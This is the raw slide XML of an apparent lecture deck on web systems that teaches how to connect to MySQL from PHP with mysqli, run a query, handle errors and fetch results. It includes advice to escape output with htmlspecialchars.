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6" r:id="rId2"/>
    <p:sldId id="270" r:id="rId3"/>
    <p:sldId id="281" r:id="rId4"/>
    <p:sldId id="311" r:id="rId5"/>
    <p:sldId id="312" r:id="rId6"/>
    <p:sldId id="313" r:id="rId7"/>
    <p:sldId id="314" r:id="rId8"/>
    <p:sldId id="284" r:id="rId9"/>
    <p:sldId id="287" r:id="rId10"/>
    <p:sldId id="289" r:id="rId11"/>
    <p:sldId id="291" r:id="rId12"/>
    <p:sldId id="294" r:id="rId13"/>
    <p:sldId id="310" r:id="rId14"/>
    <p:sldId id="296" r:id="rId15"/>
    <p:sldId id="299" r:id="rId16"/>
    <p:sldId id="300" r:id="rId17"/>
    <p:sldId id="308" r:id="rId18"/>
    <p:sldId id="297" r:id="rId19"/>
    <p:sldId id="298" r:id="rId20"/>
    <p:sldId id="301" r:id="rId21"/>
    <p:sldId id="303" r:id="rId22"/>
    <p:sldId id="305" r:id="rId23"/>
    <p:sldId id="277" r:id="rId24"/>
    <p:sldId id="273" r:id="rId25"/>
    <p:sldId id="315" r:id="rId26"/>
    <p:sldId id="279" r:id="rId27"/>
    <p:sldId id="280" r:id="rId28"/>
    <p:sldId id="316" r:id="rId29"/>
    <p:sldId id="268" r:id="rId30"/>
    <p:sldId id="271" r:id="rId31"/>
    <p:sldId id="272" r:id="rId32"/>
    <p:sldId id="274" r:id="rId33"/>
    <p:sldId id="275" r:id="rId34"/>
    <p:sldId id="276" r:id="rId35"/>
    <p:sldId id="283" r:id="rId36"/>
    <p:sldId id="317" r:id="rId37"/>
    <p:sldId id="293" r:id="rId38"/>
    <p:sldId id="285" r:id="rId39"/>
    <p:sldId id="286" r:id="rId40"/>
    <p:sldId id="318" r:id="rId41"/>
    <p:sldId id="295" r:id="rId42"/>
    <p:sldId id="288" r:id="rId43"/>
    <p:sldId id="319" r:id="rId44"/>
    <p:sldId id="290" r:id="rId45"/>
    <p:sldId id="320" r:id="rId46"/>
    <p:sldId id="321" r:id="rId47"/>
    <p:sldId id="322" r:id="rId48"/>
    <p:sldId id="323" r:id="rId49"/>
    <p:sldId id="292" r:id="rId50"/>
    <p:sldId id="324" r:id="rId51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hammad Fahad" initials="MF" lastIdx="5" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="750535509e7f3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3D2"/>
    <a:srgbClr val="5195D3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65" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="41" d="100"/>
          <a:sy n="41" d="100"/>
        </p:scale>
        <p:origin x="46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D060A-3B73-43F0-BE2E-7CE0A8E5F7B4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0DB4C7-FA3C-45C6-A884-BCF29839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4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366588-B0A5-472E-B9B9-17E0A482C14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A383C7-79F1-4A3C-BB63-E7E190198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78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83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1524000" y="3533141"/>
            <a:ext cx="9144000" cy="182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45" y="128411"/>
            <a:ext cx="11279909" cy="1075749"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000">
                <a:latin typeface="Gotham Narrow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4875288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3000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Gotham Narrow Book" pitchFamily="50" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-314326" y="446056"/>
            <a:ext cx="1004207" cy="375557"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="5195D3"/>
              </a:gs>
              <a:gs pos="58000">
                <a:srgbClr val="4E93D2"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3B87C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6045" y="1207490"/>
            <a:ext cx="1127990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6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8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045" y="365124"/>
            <a:ext cx="11279909" cy="107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45" y="1698171"/>
            <a:ext cx="11279909" cy="447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046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otham Narrow Medium" pitchFamily="50" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C8794E75-353D-442E-BDEA-2D1BE4A45A3F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean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2754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1DC9-C721-4D5F-A7A1-DF55DAF8C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3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Narrow Book" pitchFamily="50" charset="0"/>
          <a:ea typeface="Adobe Fan Heiti Std B" panose="020B07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24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87360"/>
            <a:ext cx="9144000" cy="1833565"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Systems &amp; Technologies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8690CEE-119E-45B5-9374-D4A7564C757D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3850470"/>
            <a:ext cx="9144000" cy="2076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accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gotham Narrow Book" pitchFamily="50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8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Chapter 8 – Introduction to MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chapter 10 – Accessing MySQL Using PHP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552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3CE4C-CF26-4E62-919E-8FFE63666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Connecting to a MySQL Database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83F9C-73B2-4DF9-A106-601575CDA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24350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Include login file using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>statement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a new object called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>$conn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by calling a new instance of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> method and passing it all the values retrieved from the login file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>$conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>property is used to call die function to terminate the program if there is any error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example 10-2. Connecting to a MySQL server with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>   $conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>   if ($conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-PK" sz="3000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62E0DB-CB5B-49A9-8B7E-9BB214248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49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D4AD8-5458-4A38-957A-2E99423F7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Connecting to a MySQL Database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59333-448F-4F24-B899-4977063A3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19799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Using die function will abort the PHP program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Use a more user friendly function to display a message instead:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>mysql_fatal_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>echo &lt;&lt;&lt; _END</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>We are sorry, but it was not possible to complete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>the requested task. The error message we got was:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>&lt;p&gt;Fatal Error&lt;/p&gt;Please click the back button on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>your browser and try again. If problem persists,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>please contact site admin:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>="mailto:admin@server.com"&gt;&lt;/a&gt;. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>_END;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK" sz="3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C79DE-9026-4258-8628-40AB71DC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45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E8767-8F56-4BC6-9758-02360E904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and executing a query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54469-8B51-4EF4-B785-3F0F5FECD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243504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To send a query to MySQL from PHP, use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> method of a connection object by passing the SQL query as an argument.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The query to be made is stored as a string variable (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>$query).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The query method of the $conn object returns the result.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data is returned by MySQL as an object and is stored in the variable ($result).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If there is a problem, FALSE is returned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The error property of the connection object contains the details.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Call die/user-defined function to display that error.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D294E6-49E5-41B4-9939-EA740AC48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87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E8767-8F56-4BC6-9758-02360E904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and executing a query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54469-8B51-4EF4-B785-3F0F5FECD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243504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example 10-3. Querying a database with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>   $query = "SELECT * FROM classics";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>   $result = $conn-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>   if (!$result) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK" sz="3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D294E6-49E5-41B4-9939-EA740AC48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415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2C23B-25DC-4DBD-9B7F-D95F0F473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Fetching a result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0596D-49EE-4668-BD13-0A5DF5837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259546"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>data_seek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>method is used to seek to a particular row.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>method of the object fetches a result row as an associative array.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each time around the loop, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>method is called to retrieve the value stored in each cell, and the result is displayed using echo statements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Displaying data in a browser whose source is user input, must not be trusted. Embed all such output within a call to the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which replaces all such characters with harmless HTML entities.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47642A-FA0E-4A07-94A2-0BFF1A37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53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CE1C9-9894-4A9D-9289-023486C86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10-4. Fetching results one cell at a time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300BA-941C-4EF5-9796-24145DF3A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4279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&lt;?php // query-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>mysqli.php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err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  $connection = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>hn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, $un, $pw, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  if ($connection-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  $query = "SELECT * FROM classics";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  $result = $connection-&gt;query($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  if (!$result) die("Fatal Error");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>  $rows = $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>; 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//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determine number of rows result set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PK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EAD7D8-8374-46F5-8948-D4B31CE38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69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80C56-C191-4A4F-814D-007EDA0D6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10-4. Fetching results one cell at a time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F720A-09F5-41F9-90DD-A3DAA1B09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50636"/>
            <a:ext cx="11735955" cy="55073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for ($j = 0 ; $j &lt; $rows ; ++$j) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PK" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>data_seek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($j);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  echo 'Author: ' .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()['author']) .'&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>data_seek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($j);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  echo 'Title: ' .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()['title']) .'&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>data_seek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($j);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  echo 'Type: '.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()['type']).'&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>data_seek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($j);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  echo 'Year: ' .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($result-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()['year']) .'&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
